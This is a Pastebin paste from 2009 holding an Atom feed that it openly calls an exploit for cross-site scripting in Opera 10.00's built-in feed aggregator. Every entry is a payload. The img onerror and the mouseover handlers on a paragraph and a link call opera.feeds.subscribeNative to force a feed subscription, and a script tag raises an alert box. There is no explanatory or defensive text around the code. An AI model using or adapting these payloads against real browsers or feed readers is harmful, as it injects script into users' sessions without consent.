SHARE
TWEET

Nicolas Kerschenbaum

a guest Nov 6th, 2009 242 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?xml version="1.0" encoding="utf-8"?>
  2. <feed
  3.  xmlns="http://www.w3.org/2005/Atom"
  4.  xml:base="http://labs:8888/RSS/rss.atom">
  5.   <id>http://labs:8888/RSS/rss.atom</id>
  6.   <title>XSS au sein des flux RSS sur Opera 10.00</title>
  7.   <updated>2009-09-09T00:00:00Z</updated>
  8.   <link href="" />
  9.   <link rel="self" href="" />
  10.   <author><name>Nicolas Kerschenbaum</name></author>
  11.   <contributor>
  12.     <name>Security-Wave</name>
  13.     <div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
  14.       This exploit will inject this feed in Opera's inbuilt feed aggregator
  15.     </div>
  16.   </contributor>
  17.  
  18.   <entry>
  19.     <title>Flux RSS malicieux 1</title>
  20.     <id>http://labs:8888/RSS/rss.atom#1</id>
  21.     <link href="http://labs:8888/RSS/rss.atom#1"/>
  22.     <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><img src="http://google.com" onerror="opera.feeds.subscribeNative(location.href)"></img>
  23.     </div></content>
  24.     <updated>2009-09-09T00:00:00Z</updated>
  25.   </entry>
  26.  
  27.   <entry>
  28.     <title>Flux RSS malicieux 2</title>
  29.     <id>http://labs:8888/RSS/rss.atom#2</id>
  30.     <link href="http://labs:8888/RSS/rss.atom#2"/>
  31.     <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><p onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</p>
  32.     </div></content>
  33.     <updated>2009-09-09T00:00:00Z</updated>
  34.   </entry>
  35.  
  36.     <entry>
  37.     <title>Flux RSS malicieux 3</title>
  38.     <id>http://labs:8888/RSS/rss.atom#3</id>
  39.     <link href="http://labs:8888/RSS/rss.atom#3"/>
  40.     <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><a href="http://google.com" onmouseover="opera.feeds.subscribeNative(location.href)">Mouse over me</a>
  41.     </div></content>
  42.     <updated>2009-09-09T00:00:00Z</updated>
  43.    </entry>
  44.  
  45.   <entry>
  46.     <title>Fenetre d'alerte JavaScript</title>
  47.     <id>http://labs:8888/RSS/rss.atom#4</id>
  48.     <link href="http://labs:8888/RSS/rss.atom#4"/>
  49.     <content type="xhtml"><div xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><script>window.alert('XSS by Security-Wave');</script></div></content>
  50.     <updated>2009-09-09T00:00:00Z</updated>
  51.   </entry>
  52.  </feed>
RAW Paste Data
Top